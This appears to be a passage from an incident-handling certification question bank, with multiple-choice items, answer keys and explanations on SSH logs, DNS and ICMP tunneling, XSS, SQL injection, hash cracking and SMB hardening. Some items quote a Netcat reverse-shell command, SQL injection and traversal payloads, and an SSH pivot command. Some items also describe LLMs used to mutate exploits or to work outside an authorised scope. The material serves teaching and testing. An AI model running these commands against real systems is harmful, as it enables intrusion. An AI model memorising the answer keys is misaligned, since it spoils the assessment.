The trap here is assuming any suspicious DNS traffic is domain fronting or fast flux, when the presence of TXT records and encoded subdomains specifically points to DNS tunneling.

104
MCQmedium

During an investigation of a compromised Linux web server, an incident responder needs to identify which user account was used to establish an outbound SSH session to an external IP address. Which artifact should the responder examine first?

A.The system's cron job definitions under /etc/cron.d
B.The bash command history file for each user under /home
C.The kernel ring buffer output from the dmesg command
D.The system authentication log, such as /var/log/auth.log or /var/log/secure
AnswerD

The authentication log records SSH session events, including the user account and the source and destination of connections. On most Linux distributions, sshd writes session open and close entries with the username and remote address, allowing the responder to correlate the outbound connection to a specific account. This directly answers which user initiated the session.

Why this answer

SSH session events are logged by the sshd daemon to the system authentication log, which includes the account name and connection endpoints. Examining /var/log/auth.log on Debian-based systems or /var/log/secure on Red Hat-based systems gives the responder the user attribution and timing needed. Other artifacts lack the necessary account-to-connection correlation.

Exam trap

The trap here is assuming shell history or process listings reliably attribute network connections to a user account, when only the authentication log records the SSH session owner.

105
Multi-Selecthard

Which TWO steps are critical during the 'Preparation' phase of the incident response lifecycle to ensure effective forensic investigation during a future security breach?

Select 2 answers
A.Establishing a centralized logging architecture with immutable storage.
B.Drafting an incident communication plan for notifying public regulatory bodies.
C.Defining forensic acquisition procedures and chain of custody documentation.
D.Conducting a comprehensive risk assessment of all internal business applications.
E.Purchasing cybersecurity insurance to cover potential ransomware payout costs.
AnswersA, C

Centralized logs are essential because they prevent attackers from tampering with local event logs after gaining administrative access. By ensuring storage is immutable, the organization guarantees that forensic investigators have an untampered historical record of attacker activity, which is crucial for building a reliable timeline of the intrusion.

Why this answer

Preparation is the foundation of incident response. By establishing logging infrastructure and legal protocols in advance, an organization ensures that forensic evidence is available and admissible when an incident occurs. Failing to prepare these elements often results in fragmented logs or delayed response actions, which hinders the team's ability to reconstruct the attack timeline accurately and perform root cause analysis after the threat is contained.

Exam trap

Candidates often select active response or containment steps rather than focusing strictly on proactive measures that must happen during the 'Preparation' phase before an incident starts.

106
MCQhard

An incident handler is investigating a web application that uses a templating engine. The application allows users to submit their name, which is later rendered in a greeting page. An attacker submits the payload `{{7*7}}` and the page displays `49`. The application also exposes an endpoint that accepts a template name as a parameter. Which vulnerability is most likely present?

A.Server-Side Template Injection (SSTI)
B.Insecure deserialization
C.SQL injection
D.Reflected Cross-Site Scripting (XSS)
AnswerA

The payload `{{7*7}}` being evaluated to `49` indicates that user input is being processed as a template expression rather than plain text. This is the hallmark of Server-Side Template Injection. The additional endpoint accepting a template name increases the attack surface, potentially allowing template path traversal or remote code execution depending on the engine. Incident handlers should treat this as a high-severity finding.

Why this answer

The evaluation of `{{7*7}}` to `49` demonstrates that the application processes user input as a template expression. This is Server-Side Template Injection, which can lead to remote code execution depending on the engine. The secondary endpoint that accepts a template name further increases risk.

Incident responders should isolate the application, review template engine logs, and check for any uploaded or modified templates.

Exam trap

The trap here is mistaking template expression evaluation for harmless arithmetic or for client-side XSS, when the server-side evaluation itself is the vulnerability.

107
MCQhard

An incident handler is using Nmap to scan a target behind a firewall that blocks ICMP echo requests. The handler wants to increase the chances of host discovery. Which Nmap option should be used to send TCP SYN packets to a specific port for host discovery?

A.-PP
B.-PS
C.-PE
D.-PA
AnswerB

The -PS option performs a TCP SYN ping, sending SYN packets to specified ports (default 80) to discover hosts. If the target responds with SYN/ACK or RST, it is considered up. This is effective when ICMP is blocked, as it uses TCP packets that may be allowed through the firewall, making it the correct choice.

Why this answer

When ICMP is blocked, using TCP-based host discovery can improve results. The -PS option sends TCP SYN packets to specified ports, and a response (SYN/ACK or RST) indicates the host is up. This method is more likely to succeed through firewalls that allow TCP traffic, making it the correct answer.

Exam trap

The trap here is focusing on ICMP-based options when the firewall blocks ICMP; TCP-based discovery is needed instead.

108
MCQmedium

During incident response, you observe that a compromised host is sending ICMP echo request packets with a payload size of 1000 bytes to an external IP. The payload appears to contain non-printable characters. What is the most likely explanation?

A.The host is experiencing a network loop.
B.The host is infected with a worm that scans for vulnerabilities.
C.The host is performing a ping flood attack.
D.The host is using ICMP tunneling for covert communication.
AnswerD

ICMP tunneling hides data within ICMP echo request and reply packets. The large, non-printable payload is a strong indicator that the attacker is using ICMP as a covert channel to send commands or exfiltrate data, often to bypass firewalls that allow ICMP.

Why this answer

The correct answer is ICMP tunneling for covert communication. Large ICMP packets with non-printable payloads sent to a single external IP are a classic sign of ICMP tunneling, where data is hidden in the payload to evade detection.

Exam trap

The trap here is assuming that any large ICMP packet is a ping flood, when the payload content and destination specificity indicate tunneling.

109
MCQmedium

What is the primary difference between Stored XSS and Reflected XSS?

A.Stored XSS uses server-side scripts, whereas Reflected XSS uses client-side scripts.
B.Reflected XSS is stored on the server, while Stored XSS is delivered via URLs.
C.Stored XSS permanently persists in the application, while Reflected XSS is transient.
D.Reflected XSS is more dangerous because it bypasses CSRF tokens.
AnswerC

Stored XSS payloads reside in the application's back-end storage and are served to every user who accesses the affected page. Reflected XSS payloads are transient, meaning they are processed and immediately reflected back during a single request cycle, requiring a victim to initiate the specific trigger link.

Why this answer

The difference lies in the persistence of the payload. Stored XSS injects malicious code into the server's database or permanent storage, meaning every user viewing that page is automatically affected. Reflected XSS requires the victim to click a specially crafted link that includes the payload, which is then reflected back in the response.

Understanding this distinction is vital for incident response, as Stored XSS implies a compromise of data integrity and wider impact.

Exam trap

Students often focus incorrectly on the victim delivery mechanism rather than payload persistence, confusing how the attack reaches the user with where the malicious script actually resides in storage.

110
MCQhard

A red team is using an LLM to help triage thousands of lines of reconnaissance output and propose follow-on enumeration commands. The operator wants to reduce the chance that the model proposes actions outside the client's authorized scope. Which design choice most directly constrains the model's suggestions to authorized targets and techniques?

A.Add a system prompt instructing the model to only propose actions against the client's authorized scope.
B.Ask the model to output a confidence score with each suggested command and discard suggestions below a fixed threshold.
C.Retrieve the engagement's scope definition at runtime and reject any model suggestion that references a host or technique not present in that scope list.
D.Use a larger model with a longer context window so it can track the full scope definition throughout the session.
AnswerC

Enforcing scope as an external allowlist makes the constraint independent of the model's judgment. Even if the model proposes an out-of-scope host, the pipeline blocks it before execution. This directly limits suggestions to authorized targets and techniques, which is precisely what the scenario asks for, and it does not rely on the model remembering or respecting instructions.

Why this answer

Scope enforcement must not depend on the model's willingness to comply. Retrieving the authorized scope at runtime and rejecting suggestions that reference anything outside it creates a hard boundary the model cannot talk its way past. System prompts, larger context windows, and confidence thresholds all rely on the model's internal judgment, which is exactly what the scenario requires the operator to stop trusting.

Exam trap

The trap here is believing that a well-worded system prompt or a bigger model guarantees scope compliance, when only an external allowlist can block out-of-scope actions regardless of what the model proposes.

111
MCQhard

During an incident response engagement, a GCIH analyst examines an API that accepts JSON input and notices that the application returns detailed database error messages when a single quote is inserted into the 'username' field. The analyst also observes that the same endpoint returns a 500 error when a specially crafted JSON object with nested arrays is submitted. Which vulnerability class is the analyst most likely investigating?

A.Insecure direct object references (IDOR)
B.Excessive data exposure in API responses
C.Injection flaws, such as SQL injection and improper input validation
D.Broken authentication via weak API keys
AnswerC

Detailed database errors on quote injection strongly suggest SQL injection, while the 500 error on malformed nested JSON indicates insufficient input validation. Together, they point to injection flaws where untrusted input reaches interpreters or parsers. This is consistent with the analyst's observations and is a high-severity finding.

Why this answer

The combination of database error messages in response to a single quote and a 500 error from malformed nested JSON indicates that the application is not properly validating or sanitizing input before passing it to backend interpreters. This is a classic sign of injection flaws, which can lead to data compromise or remote code execution.

Exam trap

The trap here is focusing on the 500 error as a simple crash rather than recognizing it as a symptom of improper input validation that often accompanies injection vulnerabilities.

112
MCQeasy

Which of the following password security practices is most effective at preventing the use of 'weak' passwords that are easily identified by dictionary attacks?

A.Mandating password changes every 90 days
B.Requiring a combination of uppercase and special characters
C.Using a banned password list during creation
D.Storing all passwords in a secure password manager
AnswerC

Banned password lists prevent users from setting passwords known to be weak or compromised. By blocking passwords found in databases like 'Have I Been Pwned', you eliminate the low-hanging fruit that dictionary attackers rely on for success.

Why this answer

Implementing a 'banned password list' (often called a common password list) checks user-chosen passwords against a database of previously leaked or commonly used passwords during the password change event. This prevents users from selecting passwords that are trivial to crack via dictionary attacks, effectively shifting the user base toward higher-entropy, more secure credentials.

113
MCQeasy

A security administrator is configuring a new web application and wants to implement a password hashing scheme that includes a pepper. Where should the pepper be stored to provide the intended security benefit?

A.In the same database table as the password hashes, but in a separate column.
B.In the user's browser as a cookie to ensure uniqueness per session.
C.In a configuration file on the application server, outside the database.
D.In the source code of the application, hardcoded as a constant.
AnswerC

A pepper is a secret value added to the password before hashing, and it should be stored separately from the password hashes, typically in a configuration file or hardware security module (HSM) on the application server. This way, even if the database is breached, the attacker cannot crack the hashes without also obtaining the pepper. Storing it outside the database provides defense in depth.

Why this answer

The pepper must be stored separately from the password hashes to be effective. If the database is compromised but the pepper is stored on the application server in a configuration file, the attacker cannot crack the hashes without also gaining access to that file. This separation provides an additional layer of defense.

Storing the pepper in the database or client-side negates its benefit.

Exam trap

The trap here is thinking that storing the pepper in a separate column of the same database is sufficient, but the database compromise would expose both the hashes and the pepper.

114
MCQmedium

During an internal penetration test, you capture SMB traffic between a user workstation and a file server on the same Layer 2 segment. The captured exchange shows the client sending an authentication request containing a username and a challenge/response value, but no cleartext password. You want to recover the user's cleartext password offline using a wordlist. Which attack technique should you apply to the captured challenge/response pair?

A.Extract the user's NT hash from the capture and submit it to a Pass-the-Hash tool to authenticate to the file server.
B.Decrypt the SMB session with the server's machine account key to reveal the user's password from the encrypted payload.
C.Perform an offline dictionary attack against the captured NTLMv2 challenge/response using a tool such as Hashcat with mode 5600.
D.Replay the captured challenge/response value directly to the file server to authenticate as the user without cracking it.
AnswerC

The captured material is an NTLMv2 challenge/response (NetNTLMv2), and Hashcat mode 5600 is designed specifically to crack NetNTLMv2 hashes offline against a wordlist. Because the challenge/response is derived from the user's password, guessing passwords and recomputing the response lets you recover the cleartext password without touching the live server.

Why this answer

The captured exchange is a NetNTLMv2 authentication, which exposes a challenge/response rather than a cleartext password or NT hash. To recover the cleartext password, an attacker performs an offline dictionary or brute-force attack against that response using a tool configured for NetNTLMv2, such as Hashcat mode 5600. This avoids further interaction with the target and does not trigger account lockouts on the server.

Exam trap

The trap here is assuming that a captured NTLM challenge/response can be relayed back to the same server or used directly as an NT hash, when in fact it must be cracked offline or relayed to a different target.

115
MCQmedium

An incident responder is investigating a Windows domain controller and discovers that an attacker has successfully dumped the NTDS.dit database. During offline analysis, the responder needs to prioritize cracking accounts with weak passwords using Hashcat. Which hash mode should be explicitly specified for cracking standard Windows NT LAN Manager (NTLM) password hashes extracted from this database?

A.Mode 3000, which is designated for legacy LAN Manager hashes.
B.Mode 5600, which targets NetNTLMv2 network authentication captures.
C.Mode 1000, which corresponds directly to standard NTLM password hashes.
D.Mode 13100, which is utilized for Kerberos 5 TGS-REP etype 23 tickets.
AnswerC

Hashcat utilizes mode 1000 specifically for NTLM hashes extracted from Windows operating system password databases. Providing this exact numerical identifier allows the cracking utility to properly parse the user account records and execute high-speed GPU-accelerated dictionary and rule-based attacks.

Why this answer

Hashcat mode 1000 specifically targets NTLM password hashes, which are stored within the NTDS.dit database. Modern Windows environments heavily rely on NTLM for authentication fallback and pass-the-hash attacks, making these hashes critical targets for offline cracking during incident response engagements. Accurately identifying and utilizing the correct hash algorithm identifier ensures that computing resources are focused efficiently without wasting time on incompatible parsing formats.

Exam trap

Candidates often confuse NTLM (mode 1000) with older LAN Manager hashes (mode 3000) or newer NetNTLMv2 challenge-response network authentication captures (mode 5600), leading to incorrect command execution.

116
MCQmedium

An incident handler is examining a packet capture from a compromised workstation and observes a series of DNS queries for domains like 'a1b2c3d4e5.exfil.example.com', each followed by a large TXT response. The queries are sent at regular 30-second intervals, and the subdomains contain random-looking alphanumeric strings. Which of the following techniques is MOST likely being used by the attacker?

A.DNS cache poisoning to redirect traffic
B.DNS tunneling for data exfiltration
C.Fast-flux DNS for resilience
D.Domain generation algorithm (DGA) for C2
AnswerB

The regular intervals, random subdomains, and large TXT responses are classic signs of DNS tunneling. Attackers encode stolen data in DNS queries or responses to bypass firewalls that allow DNS. The consistent timing and high volume of TXT records indicate automated exfiltration, not normal DNS behavior. This scenario matches the pattern of tools like iodine or dnscat2.

Why this answer

The correct answer is DNS tunneling for data exfiltration. The combination of regular intervals, random subdomains, and large TXT responses is a hallmark of DNS tunneling, where attackers encode data in DNS queries and responses to bypass network filters. This allows stealthy exfiltration even when other protocols are blocked.

Fast-flux, cache poisoning, and DGA do not involve such data transfer patterns.

Exam trap

The trap here is confusing DNS tunneling with DGA, but DGA typically results in failed queries, while tunneling involves successful data exchange.

117
MCQmedium

You are analyzing a PCAP and notice a large number of packets with the 'RST' flag set. What is the most likely cause for this behavior in an incident context?

A.Successful data transfer.
B.Port scanning activity.
C.Normal encrypted session renegotiation.
D.DNS zone transfer.
AnswerB

Port scanners often trigger RST responses when they attempt to connect to closed ports. When a scanner sends a SYN packet to a closed port, the target host responds with an RST/ACK to signal the connection is refused, creating a noticeable pattern of RST packets in traffic.

Why this answer

The TCP RST (Reset) flag is used to abruptly terminate a connection. A surge of these packets can indicate an active port scan, a misconfigured firewall rejecting unauthorized traffic, or an attacker attempting to clear out half-open connections. Understanding TCP state transitions is fundamental to identifying network scanning or denial-of-service attempts during the investigation of anomalous traffic patterns in packet captures.

Exam trap

Candidates frequently assume a flood of RST packets indicates a DoS attack, missing the common diagnostic pattern where port scanners trigger RST responses from closed ports.

118
MCQeasy

A security analyst is reviewing logs from a compromised Linux server and notices that an attacker has created a reverse shell using Netcat. The command executed was: nc -e /bin/bash 192.168.1.100 4444. Which of the following best describes the attacker's objective?

A.To scan the remote host for open ports.
B.To establish an interactive command shell on the compromised server.
C.To download additional tools from the remote host.
D.To exfiltrate sensitive files from the server to the remote host.
AnswerB

The command uses Netcat's -e option to execute /bin/bash and redirect its input/output to the remote IP and port. This creates a reverse shell, giving the attacker interactive command-line access to the server. The remote host listens on port 4444 to receive the connection.

Why this answer

Netcat with the -e option executes a specified program and binds its standard input/output to the network connection. When combined with /bin/bash and a remote IP/port, it creates a reverse shell that connects back to the attacker, providing interactive command execution. This is a classic post-exploitation technique for maintaining access and pivoting.

Exam trap

The trap here is assuming that any Netcat usage is for file transfer or scanning, when the -e flag specifically indicates shell execution.

119
MCQmedium

Which capability is most important for a modern incident response team to maintain when integrating AI tools into their workflow?

A.The ability to programmatically fine-tune neural network architectures.
B.The ability to perform manual forensic validation of AI-detected alerts.
C.The ability to automate the entire incident lifecycle without human oversight.
D.The ability to replace all legacy detection tools with AI-based solutions.
AnswerB

Manual forensic validation ensures that the responder can verify the 'why' and 'how' behind an AI alert. This is critical for preventing false-positive-driven downtime and for conducting thorough root cause analysis. Without the ability to manually confirm findings, the incident response team cannot effectively defend the enterprise against sophisticated, evasive, or novel threats.

Why this answer

The ability to perform manual forensic validation is the cornerstone of effective incident response, even in an era of AI. AI tools serve as force multipliers to speed up analysis, but the ultimate responsibility for accuracy and evidence integrity remains with the human responder. Maintaining these skills prevents over-reliance on automated tools, which is critical for handling novel or complex threats that the AI models were never trained to detect.

Exam trap

Candidates often prioritize 'AI proficiency' or 'speed of automation' as the most important capability, missing that the ability to validate the AI is the only way to ensure the incident response remains accurate.

120
MCQmedium

An incident responder is evaluating a compromised web application server where attackers utilized a custom Large Language Model framework to dynamically generate targeted SQL injection payloads based on real-time database error feedback. Which architectural vulnerability in the LLM integration enabled this adaptive offensive capability?

A.Failure to enforce strict context-window limits on the primary transformer model
B.Unrestricted execution loops connecting model output directly to database querying modules
C.Implementation of outdated quantization techniques on the local embedding weights
D.Misconfigured vector database permissions allowing unauthorized embedding vector reads
AnswerB

Allowing an LLM agent to directly execute generated queries based on unvalidated error responses creates an autonomous offensive loop. This systemic design flaw enables real-time payload mutation, turning the model into an adaptive exploitation engine capable of bypassing traditional perimeter defenses.

Why this answer

Integrating LLMs directly into closed-loop feedback mechanisms without rigorous output filtering allows agents to parse error logs and iteratively refine exploitation strings. Incident handlers must inspect agent memory state and prompt chains to determine how dynamic payload generation bypassed static signature-based Web Application Firewalls.

Exam trap

Test-takers often blame standard input sanitation flaws instead of recognizing the specific risk posed by unchecked, closed-loop feedback architectures connecting outputs to execution modules.

121
MCQmedium

An incident investigator reviews application logs showing that an attacker manipulated session tokens by altering underlying JSON Web Tokens without knowing the signing secret. The attacker successfully forged valid-looking administrative sessions. Which server-side vulnerability enabled this behavior?

A.Server-Side Request Forgery via unvalidated webhook URLs
B.Improper JWT algorithm validation permitting the 'none' signing algorithm
C.SQL injection within the session lookup table query
D.Cross-Site Scripting enabling session identifier theft from local storage
AnswerB

Failing to explicitly whitelist permitted cryptographic algorithms allows clients to specify 'none' in the JWT header. The verification library then bypasses signature checking, treating the unsigned payload as authentic and allowing total session integrity compromise.

Why this answer

Accepting JSON Web Tokens with the algorithm header set to 'none' is a critical cryptographic misconfiguration. When developers fail to enforce strict algorithm validation on the server side, attackers can strip cryptographic signatures entirely, modify payload claims, and gain unauthorized administrative privileges.

Exam trap

Candidates often blame 'weak signing keys' or 'expired tokens'. While those are issues, the specific vulnerability of the 'none' algorithm is a distinct configuration flaw that bypasses signature verification entirely.

122
MCQmedium

Which phase of the incident response process is most likely to involve the creation of a 'lessons learned' report to improve future security posture?

A.Detection and Analysis
B.Containment, Eradication, and Recovery
C.Post-Incident Activity
D.Preparation
AnswerC

The Post-Incident Activity phase is designed specifically for conducting a formal review of the incident response process. By documenting successes and failures, the organization can implement systemic changes to security controls, training, and response procedures, effectively closing the loop on the incident and enhancing future resilience.

Why this answer

Post-Incident Activity, often referred to as the 'Lessons Learned' phase, is the final stage of the IR lifecycle. It is essential for organizational growth, allowing the team to reflect on the effectiveness of their response, identify gaps in detection or containment, and update playbooks. This continuous improvement cycle is what differentiates a maturing security program from one that repeats the same mistakes during recurring security incidents.

Exam trap

Candidates often select containment or eradication phases when looking for long-term organizational improvement and post-incident reporting processes.

123
MCQmedium

When designing a secure cloud database, which configuration best protects against unauthorized data exfiltration if the database instance is misconfigured as public?

A.Setting a complex root password for the database.
B.Placing the database in a private subnet with restricted Security Group rules.
C.Enabling database logging for every query.
D.Using a public IP address for faster data synchronization.
AnswerB

Private subnets lack a route to an Internet Gateway, effectively isolating the database from the public internet. Restricting Security Group rules to only accept traffic from specific application server subnets ensures that even internal access is highly controlled, significantly reducing the surface area for unauthorized data exfiltration attempts.

Why this answer

Using a Virtual Private Cloud (VPC) and placing the database in private subnets ensures that the database is not routable from the public internet. By combining this with Security Groups that act as stateful firewalls, you create an isolated environment. Even if the database configuration is accidentally set to public, the network layer denies traffic, providing a critical safety net that prevents direct exploitation by external threat actors.

Exam trap

Candidates rely solely on application-level passwords or database encryption, forgetting that network architecture controls like private subnets provide essential isolation layers.

124
MCQeasy

A security analyst is reviewing logs from a web application firewall (WAF) and notices a series of requests containing payloads like ' OR 1=1 --' and 'UNION SELECT username, password FROM users'. These requests are targeting the login endpoint. Which type of attack is being attempted?

A.Cross-Site Request Forgery (CSRF)
B.Cross-Site Scripting (XSS)
C.SQL Injection (SQLi)
D.Command Injection
AnswerC

The payloads ' OR 1=1 --' and 'UNION SELECT ...' are classic SQL injection attempts. They aim to alter the logic of SQL queries to bypass authentication or extract data. The login endpoint is a common target for such attacks. This matches the observed behavior, making SQL injection the correct classification. The other options describe different attack types that do not involve SQL syntax.

Why this answer

The payloads contain SQL keywords and syntax designed to alter database queries, such as bypassing authentication or extracting data via UNION. This is characteristic of SQL injection. The other options represent different attack categories: XSS targets client-side scripts, command injection targets OS commands, and CSRF targets user browsers.

The evidence clearly points to SQL injection.

Exam trap

The trap here is misclassifying SQL injection as command injection because both are injection attacks, but the payload syntax clearly indicates SQL.

125
MCQeasy

What is the primary purpose of 'Time Stomping' during a post-exploitation phase?

A.To crash the file system and hide malicious processes.
B.To bypass file integrity monitoring (FIM) signatures.
C.To blend malicious files into the existing file system timeline.
D.To increase the privilege level of the attacker.
AnswerC

Time stomping is used to manipulate file metadata so that malicious files appear to be legitimate system files created long ago. This makes it significantly harder for human investigators to find files created during the window of compromise when searching for suspicious indicators based on time.

Why this answer

Time stomping involves modifying the timestamp attributes of files—specifically Created, Accessed, Written, and Mapped (CAWM) times—to match surrounding system files. This technique is designed to hide the presence of malicious files from forensic investigators who look for outliers in file system timelines. By understanding this, defenders know that relying solely on standard file system timestamps during an investigation is insufficient and requires secondary validation methods.

Exam trap

Candidates assume time stomping is used to destroy logs or accelerate file deletion, missing its precise forensic purpose of matching file system timelines.

126
Multi-Selectmedium

Which TWO of the following steps are considered effective for hardening the SMB service against modern threats?

Select 2 answers
A.Require SMB signing for all connections
B.Enable Guest Auth for compatibility
C.Disable the SMBv1 protocol completely
D.Use the LanmanServer for internet access
E.Disable all firewall logging on port 445
AnswersA, C

SMB signing is essential to ensure that communication between the client and server has not been tampered with. Enforcing this prevents relay attacks, as the attacker cannot produce a valid signature for the packets. This is a fundamental security requirement in any modern, secure Windows network environment.

Why this answer

Hardening SMB involves a combination of removing legacy protocols and enforcing strong authentication and integrity controls. Disabling SMBv1 is the most critical step to prevent known exploits, while enforcing SMB signing provides the necessary protection against man-in-the-middle and relay attacks. Together, these measures significantly reduce the risk of lateral movement and unauthorized access, creating a much more resilient file-sharing environment that aligns with current security standards for enterprise networks.

Exam trap

Candidates often suggest 'disabling SMB' entirely. In a production environment, you cannot simply disable SMB; you must harden it by removing legacy versions and enforcing integrity via signing.

127
MCQmedium

During an incident response engagement on a Linux server, you discover an outbound covert channel using ICMP echo request packets that contain encoded payload data within the payload field. Which specific command-line utility should you look for in the process execution history to identify the tool responsible for generating this traffic?

A.ping
B.traceroute
C.hping3
D.tcpdump
AnswerC

Hping3 enables system administrators and security testers to assemble and send custom ICMP, TCP, and UDP packets. Threat actors leverage its advanced packet crafting capabilities to smuggle encoded internal data through restricted network perimeters via covert channels.

Why this answer

Hping3 is a popular packet generator and analyzer for TCP/IP that supports crafting arbitrary ICMP packets with custom payload data. Attackers frequently leverage hping3 or similar custom scripting tools to exfiltrate data through covert channels when standard protocols are blocked by perimeter firewalls, making process history analysis critical for detection.

Exam trap

Candidates often suspect standard diagnostic tools like ping or traceroute, failing to realize that native administrative binaries lack the flexible payload manipulation required for covert data exfiltration without modification.

128
MCQhard

An application generates invoice PDFs on demand and caches them under `/var/app/cache/<userId>/<invoiceId>.pdf`. The download handler builds the path with `Paths.get(cacheRoot, userId, invoiceId + ".pdf")` and calls `Files.exists` before streaming. During an incident review, a crafted `invoiceId` value of `../../../../etc/hosts%00` produced a successful read. Which factor best explains why the containment check failed?

A.The application checks `Files.exists` before authentication completes, so unauthenticated users can probe arbitrary paths on the server.
B.The `Files.exists` call follows symbolic links by default, so an attacker can point the invoice path at a symlink outside the cache root.
C.The null byte was decoded before filesystem access, and the traversal segments were never canonicalized and compared against the cache root.
D.The per-user cache directory is writable by the application, so an attacker can overwrite the invoice file with the contents of the target file.
AnswerC

The payload combines traversal with a trailing null byte. If the decoder produces a NUL and the code concatenates before canonicalizing, the resulting path can escape the cache root, and the null may truncate the extension on platforms that honor it. Because no canonical containment check ran, `Files.exists` simply confirmed the escaped path and the file was streamed.

Why this answer

Path containment fails when the code concatenates user input, decodes it, and then checks the filesystem without canonicalizing the result. The traversal segments escape the cache root, and the trailing null byte can truncate the appended extension on affected platforms. The reliable pattern is to decode exactly once, reject null bytes and separators, canonicalize the resolved path, and confirm it still begins with the canonical cache root before any file operation.

Exam trap

The trap here is assuming that calling `Files.exists` on a constructed path provides safety, when existence checks say nothing about whether the path stayed inside the intended directory.

129
MCQmedium

An attacker manipulates a URL parameter `?file=invoice_123.pdf` to `?file=../../etc/passwd` on a web server. The application successfully returns the sensitive system file content. Which vulnerability is being exploited?

A.Cross-Site Request Forgery
B.Path Traversal
C.SQL Injection
D.Server-Side Request Forgery
AnswerB

Path Traversal exploits insufficient security validation of user-supplied input files. By injecting directory traversal sequences like double-dot-slash, attackers manipulate the server's file system path resolution. This allows unauthorized access to arbitrary files on the underlying operating system that should remain inaccessible to the web application process.

Why this answer

This scenario describes a Path Traversal attack, where an application fails to validate user input used to construct file system paths. By using dot-dot-slash notation, the attacker escapes the intended directory to access unauthorized files. This represents a critical failure in input validation and access control, commonly leading to full system compromise or sensitive data exposure, necessitating robust file path normalization and strictly defined allow-lists.

Exam trap

Candidates often confuse Path Traversal with Local File Inclusion (LFI). While related, they fail to identify the specific mechanism of escaping directories using '..' notation.

130
MCQmedium

An incident handler executes the Nmap command shown in the exhibit against a known target server. Based on the output provided, which underlying mechanism enables Nmap to determine that port 80 is open without completing a full three-way TCP handshake?

A.Nmap sends a TCP FIN packet immediately after receiving the initial SYN-ACK, forcing the remote server to close the socket gracefully.
B.Nmap listens for the application-layer banner returned by the service daemon before sending an immediate connection teardown flag.
C.Nmap transmits a TCP RST packet upon receiving a SYN-ACK from the target, preventing the local kernel from establishing a full session.
D.Nmap relies on ICMP Source Quench messages generated by the remote kernel to verify that the listener accepted the initial synchronization packet.
AnswerC

By sending a RST packet instead of the final ACK required for a full three-way handshake, Nmap prevents the target application from logging a complete connection establishment event, thereby reducing log visibility while accurately identifying open ports.

Why this answer

An Nmap SYN scan (-sS) sends a TCP SYN packet and waits for a response. If the target service is listening, it responds with a SYN-ACK packet. Upon receiving the SYN-ACK, Nmap immediately transmits a RST packet to tear down the connection before the operating system kernel can complete the standard three-way handshake, preserving stealth and speed.

Exam trap

Candidates frequently assume that Nmap completes the standard handshake and then immediately closes the socket using a FIN packet, missing the crucial detail about the RST termination.

131
MCQeasy

An attacker has gained access to a Linux server and wants to use it as a pivot point to scan the internal network. The attacker executes `ssh -D 1080 user@compromised-server` from their machine. Which of the following best describes the capability this provides to the attacker?

A.A reverse shell from the compromised server back to the attacker
B.A SOCKS proxy that allows the attacker to route TCP traffic through the compromised server
C.An encrypted file transfer channel for exfiltrating data
D.A VPN tunnel that assigns the attacker an IP address on the internal network
AnswerB

The `ssh -D` option creates a dynamic port forwarding tunnel, which sets up a SOCKS proxy on the local machine (here, port 1080). The attacker can then configure tools like proxychains or a web browser to use this SOCKS proxy, causing their traffic to be sent through the SSH tunnel and out from the compromised server. This enables pivoting into the internal network from the compromised host's perspective.

Why this answer

The `ssh -D` command establishes a dynamic port forwarding tunnel that acts as a SOCKS proxy. The attacker can then direct tools through this proxy to scan or access internal hosts as if originating from the compromised server. It does not provide a reverse shell, file transfer, or VPN functionality; those require different SSH options or tools.

Exam trap

The trap here is confusing dynamic port forwarding with other SSH tunneling features like remote port forwarding or VPNs, which have different flags and capabilities.

132
MCQeasy

A security team is configuring encryption for data at rest in an Amazon S3 bucket that stores regulated financial records. They need to ensure that the encryption keys are managed by the organization and can be rotated on demand, while also providing an audit trail of key usage. Which AWS service should they use to meet these requirements?

A.S3 server-side encryption with Amazon S3 managed keys (SSE-S3)
B.S3 server-side encryption with customer-provided keys (SSE-C)
C.AWS Key Management Service (KMS) with customer managed keys
D.Amazon S3 default encryption with AES-256
AnswerC

AWS KMS allows the creation of customer managed keys, which give the organization full control over key policies, rotation, and usage. KMS integrates with AWS CloudTrail to log every use of the key, providing an audit trail. It also supports automatic and manual key rotation. This meets the requirements for managing keys, on-demand rotation, and auditing key usage for S3 data at rest.

Why this answer

AWS KMS with customer managed keys provides the necessary control over encryption keys, including the ability to rotate them on demand and define key policies. It integrates with CloudTrail to log key usage, which is essential for auditing access to sensitive financial records. Other S3 encryption options either do not allow customer management of keys or lack the audit trail required for compliance.

Exam trap

The trap here is confusing S3 server-side encryption options with key management services; only KMS customer managed keys offer on-demand rotation and detailed audit trails.

133
MCQmedium

An organization experiences a rapid spread of ransomware across the internal network. Analysts determine that the ransomware is exploiting SMB to move laterally. Which configuration effectively limits this spread by preventing SMB communication between workstations?

A.Disabling the Workstation service on all servers
B.Implementing Windows Firewall rules to block port 445 between workstations
C.Increasing the SMB session timeout duration
D.Enabling the Print Spooler service on all workstations
AnswerB

Restricting SMB traffic on port 445 between workstations is a standard security practice to prevent lateral movement. Since workstations rarely need to share files directly with one another, blocking this traffic effectively stops many automated worms and ransomware variants from propagating across the local network segment during an active incident.

Why this answer

Disabling SMB traffic between workstations, often referred to as intra-subnet or host-to-host SMB blocking, is a highly effective mitigation strategy against ransomware. By enforcing this via Windows Firewall or Group Policy, you prevent lateral movement, as ransomware frequently uses SMB to copy its own payload to other machines. This strategy adheres to the principle of least privilege, ensuring workstations only talk to servers, not to each other.

Exam trap

Candidates often select 'disabling SMB' entirely or 'blocking all traffic' between workstations. This is incorrect because SMB is still required for legitimate server-client communication; the goal is specifically blocking host-to-host lateral movement.

134
MCQmedium

Why is it important to randomize the target IP addresses when performing a large-scale network scan?

A.To reduce the scan duration by optimizing packet routing.
B.To bypass the target operating system's rate limiting.
C.To avoid triggering threshold-based IDS alerts on specific subnets.
D.To ensure the scanner utilizes all available network interfaces.
AnswerC

Randomizing target IP addresses spreads the scanning traffic across the entire network, preventing any single subnet or host from seeing a large spike in connection attempts. This significantly lowers the likelihood of triggering signature-based or threshold-based alerts, allowing the responder to complete the discovery process without immediate detection by security systems.

Why this answer

Randomizing scan targets is a defensive measure against triggering automated threshold-based IDS/IPS alerts. By jumping between different subnets, the scanner avoids concentrating traffic on a single point in the network, which effectively prevents the security system from correlating multiple hits on a single host or subnet, thereby keeping the responder's reconnaissance activity below the typical detection thresholds of the organization.

Exam trap

Candidates often confuse target IP randomization with changing the source IP address (spoofing) or think it is designed to bypass authentication mechanisms rather than avoiding IDS/IPS volume-based traffic thresholds.

135
MCQmedium

An incident handler observes that an internal server is leaking sensitive file system structure via SMB. Which configuration change most effectively prevents SMB null session enumeration?

A.Set RestrictAnonymous to 0
B.Enable SMBv1 protocol support
C.Set RestrictAnonymous to 2
D.Disable the LanmanServer service
AnswerC

